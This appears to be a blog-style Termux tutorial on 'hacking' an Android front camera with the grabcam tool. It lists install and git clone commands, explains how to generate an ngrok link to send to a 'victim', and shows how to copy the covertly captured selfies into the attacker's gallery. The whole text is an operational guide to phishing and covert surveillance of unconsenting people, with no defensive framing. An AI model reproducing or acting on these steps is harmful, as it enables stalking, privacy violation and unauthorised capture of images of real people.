mobile camera hacking from termux
Hello, guy’s i am back with another amazing post so in this post we will get to know about how to hack any android selfies camera and get picture by sending a simple link and with simple steps without any hassles. So hacking camera is not thta easy bu at the same time it’s easy if you have some good tools/scripts so let’s go through the practical of hacking camera from link in termux with grab cam tool.
Follow below step’s
- Install termux and update and upgrade it
$ pkg install php -y
$ pkg install git -y
$ pkg install python -y
$ pkg install python2 -y
$ cd $HOME
$ git clone https://github.com/noob-hackers/grabcam
$ ls
$ cd grabcam
Now here the script executes and opens in this you have to select option 2 NGROK and turn on the hotspot of your device or else you won’t get the link. So after completing all these steps. So after 5 minutes you will get ngrok link now copy that and send it to your victim so when your victim click on it and when he explores the link his snapshot ( selfies from the front camera will be taken ) so after that come back to termux and stop the script by Volume down+ c in the keyboard. After that follow the below steps.
$ ls
Now.. Here you can see some .jpg images or .png images of your victim which is taken by the grabcam link now to see that image in the gallery follow below step.
$ cp camdec7645346454538837.png /sdcard
Now the image of the victim will be moved to your internal storage and in the gallery you can easyli view it.
NOTE:- sometimes you may get blank or black image it’s due to victims’ browser issues that’s all.